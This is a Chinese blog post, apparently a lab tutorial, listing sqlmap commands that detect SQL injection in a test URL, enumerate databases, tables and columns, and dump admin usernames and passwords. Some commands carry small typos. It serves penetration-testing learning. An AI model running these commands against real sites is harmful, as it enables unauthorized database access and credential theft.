sqlmap命令

最新推荐文章于 2024-04-26 22:00:00 发布
最新推荐文章于 2024-04-26 22:00:00 发布
阅读量1k 收藏 8
点赞数
分类专栏: 安全工具 文章标签: sqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42333641/article/details/100972447
版权

用的i春秋环境

sqlmap目录结构
在这里插入图片描述

首先得找到一个注入点

在这里插入图片描述

对注入点进行检测

python sqlmap.py -u  http://www.test.com/Art_Show.php?id=2

获取所有数据库名称

python sqlmap.py -u "http://www.test.com/Art_Show.php?id=2" --dbs

在这里插入图片描述

获取当前所在数据库

 python sqlmap.py -u "http://www.test.com/Art_Show.php?id=2 --current-db

-current-db没空格通过实例获取当前数据库名为 mys
在这里插入图片描述

获取当前数据库内所有表名称

python sqlmap.py -u "http://www.test.com/Art_Show.php?id=2"-D mys --tables

在这里插入图片描述
获取 admin 表内的列名

python sqlmap.py -u "http://www.test.com/Art_Show.php?id=2"-D mys -T zzcms_admin --columns

在这里插入图片描述
获取 name 和 password 内的账户密码

 python sqlmap.py -u"http://www.test.com/Art_Show.php?id=2"-D mys -T zzcms_admin -C name,password --dump

在这里插入图片描述

whiteso
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlmap命令大全
02-22
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令
SQLMAP更新
Tom_to的博客
01-01 5215
Kali中的sqlmap 更新
KaLi自带的sqlmap更新
m0_52701599的博客
01-25 7107
kali自带sqlmap更新
sqlmap各个命令的解释及其基本_sqlmap使用命令
最新发布
2401_84466225的博客
04-26 1181
指定注入技术 (B: Boolean-based blind, T: Time-based blind, U: UNION query, S: Stacked queries, etc.)。通过灵活运用这些命令,你可以充分发挥 SQLmap 的强大功能,深入挖掘网站的 SQL 注入漏洞。设置测试等级 (1-5),等级越高,测试越全面,时间也越长。设置风险等级 (1-3),等级越高,测试越具有攻击性。从目标 URL 开始爬取网站,并测试所有发现的链接。设置详细程度 (0-6),等级越高,输出信息越详细。
kali系统sqlmap版本升级
qq_53768302的博客
03-13 3001
kali系统sqlmap版本升级
Sqlmap命令大全
热门推荐
学习、分享、交流
05-26 2万+
Sqlmap:开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能 够查看数据,文件系统访问,甚至能够操作系统命令执行。
SQLmap常用命令
05-08
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,当然对于真实环境中这爆破功能战斗力基本为0....
SQLMAP Windows
02-23
4. **权限提升**:如果可能,SQLMAP会尝试获取数据库服务器的更高权限,例如通过执行系统命令或获取数据库用户凭据。 5. **数据库操作**:它允许用户执行自定义SQL查询,进行数据修改或删除操作。 6. **隐秘性**:...
sqlmap手册.zip
06-09
sqlmap用户手册,sqlmap命令详解,多文档,更详细 1. ./sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -f -b –current-user –current-db –users –passwords –dbs -v 0 2. ./sqlmap.py -u ...
sqlmap命令详解
Pitbull2014的博客
12-20 1125
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap使用教程(1)-指定目标,2024年最新网络安全面试题2024
2301_78146994的博客
04-13 583
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Kali中更新sqlmap步骤(直接更新会失败)
xiaohujiang的博客
07-10 1万+
1. 问题场景 如果安装老版本的sqlmap(Kali默认安装)经常破解不了,所已建议更新到最新版本。 更新命令为:sqlmap -update,直接执行这个命令,总是出错。 2. 解决办法 解决方法: 找到sqlmap的路径/usr/share/salmap 执行 cd /usr/share/ 然后删掉sqlmap rm -rf sqlmap/ 然后执行 git clone https://github.com/sqlmapproject/sqlmap 然后进入文件夹直接执行.py文件即可,或者加入到
Web安全工具—Sqlmap常用命令和参数(持续更新)
weixin_44431280的博客
04-07 1万+
Web安全工具—SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习。 一:SQLMAP介绍: 简介:sqlmap是一个由python语言编写的开源自动化渗透测试工具,主要被用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具。 支持检测的数据库:access,mysql,oracle,postgresql,sqlserver(mssql),db2等 支持的注入类型:布尔盲注,时间盲注,显错注入,堆叠注入,联合查询注入等,
SQLmap使用总结
Alexz__的博客
02-15 3659
1.简介 2.说明书翻译 3. 基础命令汇总 4.基础命令尝试 5.高级用法 壹 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQLServer、IBM DB2、SQLite、Firebird、Sybase和...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值